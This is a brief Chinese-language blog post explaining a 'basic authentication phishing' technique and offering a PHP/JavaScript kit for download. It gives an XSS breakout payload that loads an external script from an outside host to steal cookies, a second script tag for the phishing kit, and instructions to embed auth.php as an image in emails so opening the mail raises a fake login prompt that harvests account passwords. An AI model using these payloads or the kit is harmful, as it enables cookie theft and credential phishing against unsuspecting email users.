Home 应用安全 基础认证钓鱼

       大家回想一下,在接收到一个邮件打开的时候是不是会弹出这样的一个弹窗让你输入帐号密码登录呢?没错,这就是最近很火的基础认证。

       首先做一个测试,先上传测试程序到一个支持PHP的空间里,测试程序由以下几个文件构成:

       点击查看原图

需要修改1.js f.js x.php auth.php中参数。

比如:

点击查看原图

好了,接下来是两种用法:

窃取cookies实例

</textarea>'”><script src=”http://weizn.net/1.js”></script>

基础认证钓鱼利用示例:

<script src=”http://weizn.net/f.js”></script>

在任何可插入图片的地方引用http://weizn.net/auth.php

点击查看原图

打开接收的邮件后就会弹出验证框了。

点击查看原图

 

下载地址:http://dl.vmall.com/c0hywg2gh3

打赏
0 comment

You may also like

Leave a Comment

*

code